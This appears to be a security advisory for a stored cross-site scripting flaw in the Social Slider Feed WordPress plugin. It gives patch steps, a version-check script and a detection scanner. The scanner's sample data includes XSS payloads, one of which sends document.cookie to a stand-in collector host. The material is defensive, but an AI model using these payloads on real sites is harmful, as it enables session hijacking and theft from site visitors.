CVE-2024-10149

4.8 MEDIUM

📋 TL;DR

The Social Slider Feed WordPress plugin before version 2.2.9 stores and renders some of its settings without adequate sanitisation and escaping, leaving a stored cross-site scripting (XSS) flaw. A user with administrator privileges can save script in those settings that then executes in the browser of anyone who views the affected pages. The plugin does not honour the unfiltered_html capability, so the bug matters most where that capability is deliberately withheld from administrators, as in WordPress multisite. Only sites running a vulnerable version of this specific plugin are affected.

💻 Affected Systems

Products:
  • Social Slider Feed WordPress Plugin
Versions: All versions before 2.2.9
Operating Systems: All operating systems running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: The plugin must be installed and active on the WordPress site. No non-default setting is needed; the vulnerable code path is reachable in the plugin's default configuration.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker holding (or having compromised) an administrator account injects JavaScript into the plugin's settings, and it runs in the browser of every user who views the affected pages. WordPress authentication cookies are HttpOnly, so cookie theft is unlikely; the realistic payload instead rides the victim's authenticated session, performing privileged actions in their name (for example against a network super admin in a multisite install) or redirecting visitors to phishing pages, which can end in complete site compromise.

🟠

Likely Case

On a single-site install an administrator already holds unfiltered_html and can place script almost anywhere, so this bug adds little there. The likely case is a multisite network or managed-hosting setup where site administrators are deliberately denied unfiltered_html: one of them stores script in the plugin's settings and it runs for other users, including network super admins, who view the affected content, exposing their credentials or letting the script act on their behalf.

🟢

If Mitigated

With administrator accounts limited to trusted people and the plugin kept current, residual risk is low. Note that withholding unfiltered_html (the multisite default, or DISALLOW_UNFILTERED_HTML) is not a mitigation for this bug: vulnerable versions store and render these settings regardless of that capability.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an administrator-level account on the WordPress site (in multisite, a site administrator is enough). No public exploit code has been identified, but none is really needed: a user with that access saves the payload through the plugin's ordinary settings, which is why complexity is rated LOW.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.2.9

Vendor Advisory: https://wpscan.com/vulnerability/1619dc4b-4e5e-4b82-820b-3c4e732db3ad/

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find 'Social Slider Feed' and click 'Update Now'.
4. Verify that the version shown is 2.2.9 or higher.

🔧 Temporary Workarounds

Disable Plugin

all

Temporarily disable the vulnerable plugin until patched

wp plugin deactivate social-slider-feed

Restrict Admin Access

all

Limit administrative accounts to trusted personnel only

🧯 If You Can't Patch

  • Remove the Social Slider Feed plugin completely (deactivating leaves the code on disk and one click from reactivation; deleting it does not)
  • Add Content Security Policy (CSP) headers on the public pages that render the plugin's output, ideally with a script-src that does not allow 'unsafe-inline'. This limits what an injected script can do but does not remove the stored payload, and wp-admin itself depends heavily on inline scripts, so a strict CSP there is rarely practical.

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel → Plugins → Social Slider Feed → Version. If version is below 2.2.9, system is vulnerable.

Check Version:

wp plugin get social-slider-feed --field=version

Verify Fix Applied:

After update, confirm version shows 2.2.9 or higher in WordPress plugins list.
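As an added example (it is not part of the advisory and not code from the plugin vendor), the check and fix above as a POSIX sh helper around WP-CLI. The function names version_lt, is_vulnerable_version, check_site and update_site are this example's own; `wp plugin get --field=version` and `wp plugin update` are standard WP-CLI commands, and the WordPress path is assumed to be passed as the first argument. The version comparison is numeric per component rather than a string comparison, so a later 2.2.10 release is correctly treated as fixed while 2.2 or 1.10.3 are treated as vulnerable.

```shell
#!/bin/sh
# Added example: audit and remediate Social Slider Feed with WP-CLI.
# Function names (version_lt, is_vulnerable_version, check_site, update_site)
# are this example's own; `wp plugin get/update` are standard WP-CLI commands.
FIXED_VERSION="2.2.9"

# version_lt A B: succeed (exit 0) when A is strictly older than B.
# Components are compared numerically so that 2.2.10 sorts after 2.2.9;
# a plain string comparison would wrongly treat "2.2.10" as older than "2.2.9".
# Pre-release suffixes (e.g. "2.2.9-beta") are ignored.
version_lt() {
  a="$1"; b="$2"
  while [ -n "$a" ] || [ -n "$b" ]; do
    x=${a%%.*}; y=${b%%.*}                          # leading component of each
    case "$a" in *.*) a=${a#*.};; *) a="";; esac     # drop it from A
    case "$b" in *.*) b=${b#*.};; *) b="";; esac     # drop it from B
    x=$(printf '%s' "$x" | tr -cd '0-9'); y=$(printf '%s' "$y" | tr -cd '0-9')
    x=${x:-0}; y=${y:-0}                            # missing component counts as 0
    if [ "$x" -lt "$y" ]; then return 0; fi
    if [ "$x" -gt "$y" ]; then return 1; fi
  done
  return 1   # versions are equal
}

# is_vulnerable_version V: succeed when V is older than the fixed release.
is_vulnerable_version() { version_lt "$1" "$FIXED_VERSION"; }

# check_site WP_PATH: exit 0 = vulnerable, 1 = fixed, 2 = plugin not installed.
check_site() {
  v=$(wp plugin get social-slider-feed --field=version --path="$1" 2>/dev/null) || {
    echo "social-slider-feed not installed at $1"; return 2; }
  if is_vulnerable_version "$v"; then
    echo "VULNERABLE: social-slider-feed $v (< $FIXED_VERSION) at $1"; return 0
  fi
  echo "OK: social-slider-feed $v at $1"; return 1
}

# update_site WP_PATH: update only when vulnerable, then re-check.
# Succeeds when the site is no longer vulnerable afterwards.
update_site() {
  check_site "$1" || return 0          # nothing to do: fixed or not installed
  wp plugin update social-slider-feed --path="$1"
  ! check_site "$1"                    # succeed only if no longer vulnerable
}

# Usage: . ./sslf-check.sh; check_site /var/www/example; update_site /var/www/example
```

Source the file and run `check_site` against each WordPress root from your inventory; `update_site` touches only sites that report vulnerable and re-checks them afterwards, so it is safe to run over the whole fleet.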

📡 Detection & Monitoring

Log Indicators:

  • Changes to the plugin's settings by an administrator account outside normal change windows, or by an account that does not usually touch this plugin (an activity-log plugin that records option updates makes these visible)
  • Stored option values for the plugin containing <script tags, inline event handlers (onerror=, onload=) or javascript: URLs

Network Indicators:

  • Browsers of users viewing pages that embed the plugin's output making requests to unfamiliar domains (visible in proxy logs or in CSP report-only violation reports)
  • Redirects from those pages to external sites the site does not legitimately link to

SIEM Query:

source="wordpress" AND (plugin="social-slider-feed" AND version<"2.2.9")

Caveat: most SIEMs evaluate version<"2.2.9" as a string comparison, so a later 2.2.10 or 2.10.0 release would be flagged as vulnerable. Confirm hits with a numeric per-component comparison, or split the version into numeric major/minor/patch fields before comparing.
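As an added example, not from the advisory or the plugin, a small scanner for the stored-script indicator above, run here over a constructed sample in the CSV layout of `wp option list --format=csv --fields=option_name,option_value`. The sslf_* option names in the sample are hypothetical; the advisory does not name the plugin's options. It goes a little beyond the bare <script> case by also matching entity-encoded &lt;script, inline event handlers and javascript: URLs, while ignoring words such as "button=" that merely contain "on".

```shell
#!/bin/sh
# Added example: flag stored script payloads in exported WordPress options.
# Feed find_script_payloads the CSV from
#   wp option list --format=csv --fields=option_name,option_value
# (or the same two columns from a SQL export). It prints matching option names.
# The sslf_* option names below are constructed for this example; the real
# plugin's option names are not given in the advisory.

# Markers that should never appear in a settings value:
#   <script (also HTML-entity encoded as &lt;script), inline event handlers
#   such as onerror= / onload= (must not be part of a longer word), javascript: URLs.
PAYLOAD_RE='<script|&lt;script|(^|[^[:alnum:]_])on[[:alpha:]]+[[:space:]]*=|javascript:'

# find_script_payloads: reads name,value lines on stdin, prints names that match.
find_script_payloads() {
  grep -iE "$PAYLOAD_RE" | cut -d, -f1
}

# Constructed sample in `wp option list` CSV format (embedded quotes doubled).
SAMPLE_OPTIONS='option_name,option_value
blogname,Example Site
sslf_widget_title,Latest posts
sslf_custom_css,"<script>fetch(""https://collector.example/c?""+document.cookie)</script>"
sslf_link_text,"<a href=""javascript:alert(1)"">follow</a>"
sslf_image_alt,"x"" onerror=""alert(document.domain)"
sslf_button_label,"button=1 icon_on=2"
siteurl,https://example.com'

# scan_sample: run the scanner over the constructed sample. For a live site
# pipe `wp option list --format=csv --fields=option_name,option_value` instead.
scan_sample() {
  printf '%s\n' "$SAMPLE_OPTIONS" | find_script_payloads
}
```

On a real site, run the scan from cron and alert when the output is non-empty; a hit on an option the plugin owns is direct evidence of a stored payload and points at which setting to clean.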

🔗 References
